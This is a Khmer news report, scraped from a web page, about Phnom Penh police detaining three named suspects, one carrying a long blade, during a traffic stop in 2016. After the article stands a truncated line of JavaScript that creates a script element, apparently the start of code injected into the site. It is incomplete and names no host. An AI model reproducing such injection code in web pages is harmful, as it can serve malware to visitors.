ព្រឹតិ្តការណ៍ថ្មីៗ

រក្សាទុកដាវសាំម៉ូរៃ៉ជិតកន្លះម៉ែត្រតាមខ្លួន ត្រូវកម្លាំងនគរបាលប៉ុស្តិ៍ឃ្មួញឃាត់ខ្លួនមកសួរនាំ

2 ឆ្នាំ មុន 0 តូ សុផល

ភ្នំពេញ៖ នគរបាលប៉ុស្តិ៍ឃ្មួញឃាត់មនុស្ស៣នាក់ស្រី១ម្នាក់ខណៈដែល ឃើញជិះម៉ូតូអត់ស្លាកលេខឃាត់ត្រួតពិនិត្យប្រទះឃើញមានរក្សាទុកកាំបិតឆ្នៃដែលមានប្រវែងជិតកន្លះម៉ែត្រលាក់ក្នុងកាបូបស្ពាយក៍ឃាត់ខ្លួនតែម្តង។

ការឃាត់ខ្លួន៣នាក់ខាងលើកាលពីម៉ោង១៩និង៣០នាទីយប់ថ្ងៃទី០៦សីហា២០១៦នៅចំណុចក្នុងហ្គ្រេនភ្នំពេញ ផ្លូវបេតុង ភូមិអន្លង់ក្ងាន សង្កាត់ឃ្មួញ ខណ្ឌសែនសុខ។
ប្រភពពីលោក ញាណ នន នាយប៉ុស្តិ៍រដ្ឋបាលសង្កាត់ឃ្មួបានប្រាប់អោយដឹងថា ជនសង្ស័យខាងលើ
ទី១ ឈ្មោះ ធី វុត្ថា ភេទប្រុស អាយុ៣៤ឆ្នាំមុខរបរបើកស្នាក់នៅភូមិទួលអំពិលឃុំពញ្ញាឮស្រុកពញ្ញាឮ ខេត្តកណ្តាល។
ទី២ ឈ្មោះ កែន ស្រ៊ុន ហួរ ភេទប្រុស អាយុ២០ឆ្នាំមុខរបរបើកបរស្នាក់នៅភូមិធ្យូង ឃុំវិហារហ្លួង ស្រុក ពញ្ញាឮ ខេត្តកណ្តាល អ្នករក្សាទុកកាំបិតឆ្នៃខាងលើ។
ទី៣ ឈ្មោះ សុន សុខារី ភេទ ស្រីអាយុ១៩ឆ្នាំមុខរបរនៅផ្ទះ ស្នាក់នៅភូមិធ្យូងឃុំ វិហារហ្លួង ស្រុកពញ្ញាឮ ខេត្តកណ្តាលត្រូវជាប្រពន្ធ កែន ស្រ៊ុន ហួរ។

តាមការរៀបរាប់របស់ជនស្ស័យខាងលើបានប្រាប់សមត្ថកិច្ចថា នៅមុនសមត្ថកិច្ចឃាត់ខ្លួនគឺពួកគេទាំង៣ នាក់បានជិះម៉ូតូមួយគ្រឿងម៉ាកស្មាក់វីពណ៌ខ្មៅអត់ស្លាកលេខចេញពីស្រុកគោលបំណងជិះទៅលេងផ្ទះបងប្អូននៅជិតវត្តឈូកវ៉ាក្នុងសង្កាត់គោករកា
ខណ្ឌព្រែកព្នៅខណះមកដល់ចំណុចខាងលើបានជួបសមត្ថកិច្ចឃាត់ពិនិត្យបានឃើញកាំបិតឆ្នៃដែលខ្លួនទុកក្នុងកាបូបស្ពាយខាងក្រោយក៍ឃាត់ខ្លួនពួកគេតែម្តង។

ជនសង្ស័យឈ្មោះ កែន ស្រ៊ុន ហួរ បានប្រាប់ ខ្លួនរក្សាទុកកាំបិតឆ្នៃ ជាប់ខ្លួនដោយសារតែខ្លួនមកលេង ផ្ទះបងប្អូនលើកមុនមានក្មេងស្ទាវមកវាយលើខ្លួនរបស់គេទើបលើនេះមកម្តងទៀតបានយកកាំបិតឆ្នៃខាងលើមកតាមគោលបំណងទុកការពារខ្លួនប៉ុណ្ណោះ។
សមត្ថកិច្ចបានប្រាប់ថាមុនឃាត់ខ្លួនក្រុមខាងលើនេះខណៈដែលកំម្លាងប៉ុស្តិ៍ចេញល្បាតពួនស្ទាក់ក្នុងមូលដ្ឋានបានឃើញក្រុមខាងលើជិះម៉ូតូស្មាក់វីពណ៌ខ្មៅអត់ស្លាកលេខឌុបគ្នាដោយសង្ស័យក៍ហៅត្រួតពិនិត្យក៍ប្រទះឃើញកាំបិតឆ្នៃដែលមានប្រវែង(ជិតកន្លះម៉ែត្រ)លាក់ក្នុងកាបូបស្ពាយក៍ឃាត់ខ្លួនទាំង៣នាក់យក
មកធ្វើការសាកសួរតែម្តង។
បច្ចុប្បន្នក្រុមខាងលើត្រូវបានឃាត់ខ្លួនបណ្តោះអាសន្នយកទៅសាកសួរនៅអធិការដ្ឋាននគរបាលខណ្ឌសែនសុខ។

imagevar d=document;var s=d.createElement(‘script’);

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ

error: Content is protected !!